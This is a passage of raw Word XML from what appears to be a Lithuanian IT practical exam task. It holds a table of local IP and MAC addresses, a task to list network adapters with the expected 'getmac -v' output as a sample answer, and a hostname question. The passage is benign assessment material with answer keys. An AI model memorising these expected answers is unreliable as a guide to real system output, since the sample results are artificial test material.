              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4576813F" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E492387" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>00-60-56-C0-00-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1AE851D9" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F7E630" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6246869E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A74AAB" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>00-60-56-C0-00-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1FF5C9B9" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D98AF7F" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459187C8" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B12EC07" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>30-9C-23-DF-8D-95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="514CFB81" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33487761" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E188E6A" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F1C71F8" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>0A-00-27-00-00-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007467FF" w:rsidRPr="005A5C28" w14:paraId="17BEAF4A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1159577D" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B7DFECC" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BA4AE48" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>7A-79-19-70-62-F6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09576707" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011530DB" w14:textId="541EB1F7" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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5 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="001C0A92" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMI ASMENINĮ KOMPIUTERĮ </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATSAKYKITE Į KLAUSIMUS TEKSTU ARBA EKRANO NUOTRAUKOMIS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30792201" w14:textId="31AA0566" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="009B3B0E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="009B3B0E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMAS REZULTATAS </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A58B4" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tinklo adapterių sąrašą;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7BC8F1B5" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C9D126" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>PS C:\Users\IT&gt; getmac -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54697DE3" w14:textId="0632414C" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Connection Name Network Adapter Physical Address</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Transport Name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0F5A8F" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>=============== =================== ==========================================================</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E120BC5" w14:textId="7C92A2D3" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>VMware Network</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>VMware Virtual</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>00-50-56-C0-00-01</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{761518CA-C621-45BD-8BDE-083305F80C10}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755A6D17" w14:textId="08501E35" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>VMware Network</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>VMware Virtual</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>00-50-56-C0-00-08</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{EA8413A3-DD25-446D-898A-2C47302AF856}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2917F41B" w14:textId="389A7615" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Eternetas</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Realtek PCIe Gb 30-9C-23-DF-8D-95</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{69B3BD4B-ADF2-4FF1-9428-7010402F29BB}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FC8741" w14:textId="505322A0" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Eternetas 3</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>VirtualBox Host 0A-00-27-00-00-19</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{F87AC024-2249-4A37-9AA0-6AFCE03D63DB}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70DD7B1D" w14:textId="401199A8" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Hamachi</w:t>
            </w:r>
            <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>LogMeIn Hamachi 7A-79-19-70-62-F6</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>\Device\Tcpip_{A8A62BA5-3DBC-400C-A82A-EF25A6E0C05A}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66ED956D" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio HOSTNAME;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="748C0E9B" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438A6D5C" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="14"/>
              </w:rPr>
